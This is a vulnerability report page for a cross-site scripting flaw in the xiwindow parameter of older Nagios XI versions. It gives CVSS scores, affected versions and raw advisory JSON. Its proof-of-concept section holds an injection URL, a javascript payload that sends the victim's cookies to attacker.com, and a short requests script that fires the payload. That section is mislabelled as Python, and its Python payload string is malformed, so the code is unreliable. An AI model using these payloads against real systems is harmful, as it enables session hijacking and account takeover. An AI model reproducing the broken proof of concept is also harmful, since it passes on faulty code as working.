Security Vulnerability Report
中文
CVE-2011-10037 CVSS 5.4 MEDIUM

CVE-2011-10037

Published: 2025-10-30 22:15:35
Last Modified: 2025-11-06 17:15:41

Description

Nagios XI versions prior to 2011R1.9 are vulnerable to cross-site scripting (XSS) via the handling of xiwindow variables used to build permalinks in the web interface. Insufficient validation or escaping of user-supplied input may allow an attacker to inject and execute arbitrary script in the context of a victim's browser.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nagios:nagios_xi:2011:r1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nagios:nagios_xi:2011:r1.1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nagios:nagios_xi:2011:r1.2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nagios:nagios_xi:2011:r1.3:*:*:*:*:*:* - VULNERABLE
Nagios XI < 2011R1.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2011-10037 Nagios XI XSS PoC --> <!-- Target: Nagios XI versions prior to 2011R1.9 --> <!-- Attack Vector: Malicious xiwindow parameter in URL --> <!DOCTYPE html> <html> <head> <title>CVE-2011-10037 PoC</title> </head> <body> <h2>CVE-2011-10037 Nagios XI XSS PoC</h2> <p>Target: Nagios XI < 2011R1.9</p> <h3>Malicious URL:</h3> <textarea id="maliciousUrl" rows="3" cols="80" readonly> https://[NAGIOS_XI_HOST]/nagiosxi/includes/components/xicore/xicore.php?xiwindow=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E%3Cx%20y=%22 </textarea> <h3>Cookie Stealing Payload:</h3> <textarea id="cookiePayload" rows="2" cols="80" readonly> javascript:document.location='http://attacker.com/steal?cookie='+document.cookie </textarea> <h3>Python PoC Script:</h3> <pre> import requests target = "http://[NAGIOS_XI_HOST]/nagiosxi/includes/components/xicore/xicore.php" xss_payload = "\"><script>alert(document.cookie)</script>\" params = {"xiwindow": xss_payload} response = requests.get(target, params=params) print(f"Status: {response.status_code}") print(f"Response length: {len(response.text)}") </pre> <script> // Basic XSS detection script function testXSS() { const testPayload = "<script>alert('XSS')</script>"; console.log("Testing XSS payload:", testPayload); } </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2011-10037", "sourceIdentifier": "[email protected]", "published": "2025-10-30T22:15:35.363", "lastModified": "2025-11-06T17:15:41.037", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nagios XI versions prior to 2011R1.9 are vulnerable to cross-site scripting (XSS) via the handling of xiwindow variables used to build permalinks in the web interface. Insufficient validation or escaping of user-supplied input may allow an attacker to inject and execute arbitrary script in the context of a victim's browser."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*", "versionEndIncluding": "2009", "matchCriteriaId": "F5A0F705-A92D-4A44-820E-AA95C185FD0A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2011:r1:*:*:*:*:*:*", "matchCriteriaId": "B2FB1221-7B2A-4C1F-877B-87A85C5F67F3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2011:r1.1:*:*:*:*:*:*", "matchCriteriaId": "B8A58F77-B01F-43E5-8AB8-9BBC7AFB8EA6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2011:r1.2:*:*:*:*:*:*", "matchCriteriaId": "930BA0E1-526F-444D-B55C-0F3986B28204"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2011:r1.3:*:*:*:*:*:*", "matchCriteriaId": "12F74EFA-B2E0-4DC6-8ECE-8CBD474B5F30"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2011:r1.4:*:*:*:*:*:*", "matchCriteriaId": "21AB904E-BE1B-420E-AA2E-BC45DF8BC745"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2011:r1.5:*:*:*:*:*:*", "matchCriteriaId": "4664377B-70C1-403A-9A61-F1CECCBC5CEF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2011:r1.6:*:*:*:*:*:*", "matchCriteriaId": "29011240-37E3-499A-AAF1-7B0F722F16A3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2011:r1.7:*:*:*:*:*:*", "matchCriteriaId": "E0E3B832-C219-475D-A433-6914973DCA3C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2011:r1.8:*:*:*:*:*:*", "matchCriteriaId": "5B5DD634-765B-44D0-A1D1-27DC326A3477"}]}]}], "references": [{"url": "http://0a29.blogspot.com/2011/12/0a29-11-3-cross-site-scripting.html", "source": "[email protected]"}, {"url": "https://www.nagios.com/changelog/nagios-xi/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/nagios-xi-xss-via-xiwindow-variables-affecting-permalinks", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}